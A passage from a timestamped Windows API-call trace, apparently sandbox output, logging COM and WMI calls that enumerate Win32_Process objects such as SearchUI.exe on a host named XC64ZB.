riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x55156a0) returned 0x0 [0264.345] IUnknown:QueryInterface (in: This=0x55156a0, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0264.345] IUnknown:QueryInterface (in: This=0x55156a0, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0264.345] IUnknown:QueryInterface (in: This=0x55156a0, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0264.346] IUnknown:AddRef (This=0x55156a0) returned 0x3 [0264.346] IUnknown:QueryInterface (in: This=0x55156a0, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0264.346] IUnknown:QueryInterface (in: This=0x55156a0, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0264.346] IUnknown:QueryInterface (in: This=0x55156a0, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x55156a4) returned 0x0 [0264.346] IMarshal:GetUnmarshalClass (in: This=0x55156a4, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0264.346] IUnknown:Release (This=0x55156a4) returned 0x3 [0264.346] CoGetContextToken (in: pToken=0x19e178 | out: pToken=0x19e178) returned 0x0 [0264.346] CoGetContextToken (in: pToken=0x19e580 | out: pToken=0x19e580) returned 0x0 [0264.346] IUnknown:QueryInterface (in: This=0x55156a0, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0264.346] IUnknown:Release (This=0x55156a0) returned 0x2 [0264.346] CoGetContextToken (in: pToken=0x19eb50 | out: pToken=0x19eb50) returned 0x0 [0264.346] CoGetContextToken (in: pToken=0x19eab0 | out: pToken=0x19eab0) returned 0x0 [0264.346] IUnknown:QueryInterface (in: This=0x55156a0, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x55156a0) returned 0x0 [0264.346] IUnknown:AddRef (This=0x55156a0) returned 0x4 [0264.346] IUnknown:Release (This=0x55156a0) returned 0x3 [0264.347] IUnknown:Release (This=0x55156a0) returned 0x2 [0264.347] CoTaskMemFree (pv=0x54ba388) [0264.347] CoGetContextToken (in: pToken=0x19eeb8 | out: pToken=0x19eeb8) returned 0x0 [0264.347] IUnknown:AddRef (This=0x55156a0) returned 0x3 [0264.347] IWbemClassObject:Get (in: This=0x55156a0, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0264.347] IWbemClassObject:Get (in: This=0x55156a0, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"2568\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0264.347] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"2568\"") returned 0x5e [0264.347] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"2568\"") returned 0x5e [0264.347] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0264.347] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0264.348] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0264.348] IUnknown:Release (This=0x601a94) returned 0x1 [0264.349] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba248) returned 0x0 [0264.349] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba248, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0264.349] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba248, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x55153e8) returned 0x0 [0264.349] WbemDefPath:IUnknown:Release (This=0x54ba248) returned 0x0 [0264.349] WbemDefPath:IUnknown:QueryInterface (in: This=0x55153e8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x55153e8) returned 0x0 [0264.349] WbemDefPath:IUnknown:QueryInterface (in: This=0x55153e8, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0264.349] WbemDefPath:IUnknown:QueryInterface (in: This=0x55153e8, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0264.350] WbemDefPath:IUnknown:AddRef (This=0x55153e8) returned 0x3 [0264.350] WbemDefPath:IUnknown:QueryInterface (in: This=0x55153e8, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0264.350] WbemDefPath:IUnknown:QueryInterface (in: This=0x55153e8, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0264.350] WbemDefPath:IUnknown:QueryInterface (in: This=0x55153e8, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x5514180) returned 0x0 [0264.350] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5514180, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0264.350] WbemDefPath:IUnknown:Release (This=0x5514180) returned 0x3 [0264.350] CoGetContextToken (in: pToken=0x19e2c8 | out: pToken=0x19e2c8) returned 0x0 [0264.350] CoGetContextToken (in: pToken=0x19e6d0 | out: pToken=0x19e6d0) returned 0x0 [0264.350] WbemDefPath:IUnknown:QueryInterface (in: This=0x55153e8, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0264.350] WbemDefPath:IUnknown:Release (This=0x55153e8) returned 0x2 [0264.350] WbemDefPath:IUnknown:Release (This=0x55153e8) returned 0x1 [0264.350] CoGetContextToken (in: pToken=0x19f058 | out: pToken=0x19f058) returned 0x0 [0264.350] CoGetContextToken (in: pToken=0x19efb8 | out: pToken=0x19efb8) returned 0x0 [0264.350] WbemDefPath:IUnknown:QueryInterface (in: This=0x55153e8, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x55153e8) returned 0x0 [0264.351] WbemDefPath:IUnknown:AddRef (This=0x55153e8) returned 0x3 [0264.351] WbemDefPath:IUnknown:Release (This=0x55153e8) returned 0x2 [0264.351] WbemDefPath:IWbemPath:SetText (This=0x55153e8, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"2568\"") returned 0x0 [0264.351] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0264.351] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0264.351] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.351] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0264.351] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0264.351] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.351] IWbemClassObject:Get (in: This=0x55156a0, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23c75fc*=0, plFlavor=0x23c7600*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="SearchUI.exe", varVal2=0x0), pType=0x23c75fc*=8, plFlavor=0x23c7600*=0) returned 0x0 [0264.351] SysStringByteLen (bstr="SearchUI.exe") returned 0x18 [0264.351] SysStringByteLen (bstr="SearchUI.exe") returned 0x18 [0264.351] IWbemClassObject:Get (in: This=0x55156a0, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23c75fc*=8, plFlavor=0x23c7600*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="SearchUI.exe", varVal2=0x0), pType=0x23c75fc*=8, plFlavor=0x23c7600*=0) returned 0x0 [0264.351] SysStringByteLen (bstr="SearchUI.exe") returned 0x18 [0264.351] SysStringByteLen (bstr="SearchUI.exe") returned 0x18 [0264.351] CoTaskMemAlloc (cb=0x4) returned 0x54ba2c8 [0264.351] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba2c8, puReturned=0x23c1fd0 | out: apObjects=0x54ba2c8*=0x6a0258, puReturned=0x23c1fd0*=0x1) returned 0x0 [0264.352] IUnknown:QueryInterface (in: This=0x6a0258, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x6a0258) returned 0x0 [0264.352] IUnknown:QueryInterface (in: This=0x6a0258, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0264.352] IUnknown:QueryInterface (in: This=0x6a0258, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0264.352] IUnknown:QueryInterface (in: This=0x6a0258, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0264.353] IUnknown:AddRef (This=0x6a0258) returned 0x3 [0264.353] IUnknown:QueryInterface (in: This=0x6a0258, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0264.353] IUnknown:QueryInterface (in: This=0x6a0258, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0264.353] IUnknown:QueryInterface (in: This=0x6a0258, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x6a025c) returned 0x0 [0264.353] IMarshal:GetUnmarshalClass (in: This=0x6a025c, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0264.353] IUnknown:Release (This=0x6a025c) returned 0x3 [0264.353] CoGetContextToken (in: pToken=0x19e178 | out: pToken=0x19e178) returned 0x0 [0264.353] CoGetContextToken (in: pToken=0x19e580 | out: pToken=0x19e580) returned 0x0 [0264.353] IUnknown:QueryInterface (in: This=0x6a0258, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0264.353] IUnknown:Release (This=0x6a0258) returned 0x2 [0264.353] CoGetContextToken (in: pToken=0x19eb50 | out: pToken=0x19eb50) returned 0x0 [0264.353] CoGetContextToken (in: pToken=0x19eab0 | out: pToken=0x19eab0) returned 0x0 [0264.353] IUnknown:QueryInterface (in: This=0x6a0258, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x6a0258) returned 0x0 [0264.353] IUnknown:AddRef (This=0x6a0258) returned 0x4 [0264.353] IUnknown:Release (This=0x6a0258) returned 0x3 [0264.353] IUnknown:Release (This=0x6a0258) returned 0x2 [0264.353] CoTaskMemFree (pv=0x54ba2c8) [0264.353] CoGetContextToken (in: pToken=0x19eeb8 | out: pToken=0x19eeb8) returned 0x0 [0264.353] IUnknown:AddRef (This=0x6a0258) returned 0x3 [0264.353] IWbemClassObject:Get (in: This=0x6a0258, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0264.354] IWbemClassObject:Get (in: This=0x6a0258, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3416\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0264.354] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3416\"") returned 0x5e [0264.354] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3416\"") returned 0x5e [0264.354] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0264.354] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0264.354] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0264.354] IUnknown:Release (This=0x601a94) returned 0x1 [0264.355] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba398) returned 0x0 [0264.355] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba398, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0264.355] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba398, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x5514d58) returned 0x0 [0264.355] WbemDefPath:IUnknown:Release (This=0x54ba398) returned 0x0 [0264.355] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514d58, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x5514d58) returned 0x0 [0264.355] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514d58, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0264.355] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514d58, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0264.355] WbemDefPath:IUnknown:AddRef (This=0x5514d58) returned 0x3 [0264.355] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514d58, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0264.355] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514d58, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0264.355] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514d58, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x5514300) returned 0x0 [0264.356] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5514300, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0264.356] WbemDefPath:IUnknown:Release (This=0x5514300) returned 0x3 [0264.356] CoGetContextToken (in: pToken=0x19e2c8 | out: pToken=0x19e2c8) returned 0x0 [0264.356] CoGetContextToken (in: pToken=0x19e6d0 | out: pToken=0x19e6d0) returned 0x0 [0264.356] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514d58, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0264.356] WbemDefPath:IUnknown:Release (This=0x5514d58) returned 0x2 [0264.356] WbemDefPath:IUnknown:Release (This=0x5514d58) returned 0x1 [0264.356] CoGetContextToken (in: pToken=0x19f058 | out: pToken=0x19f058) returned 0x0 [0264.356] CoGetContextToken (in: pToken=0x19efb8 | out: pToken=0x19efb8) returned 0x0 [0264.356] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514d58, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x5514d58) returned 0x0 [0264.356] WbemDefPath:IUnknown:AddRef (This=0x5514d58) returned 0x3 [0264.356] WbemDefPath:IUnknown:Release (This=0x5514d58) returned 0x2 [0264.356] WbemDefPath:IWbemPath:SetText (This=0x5514d58, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3416\"") returned 0x0 [0264.356] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0264.356] 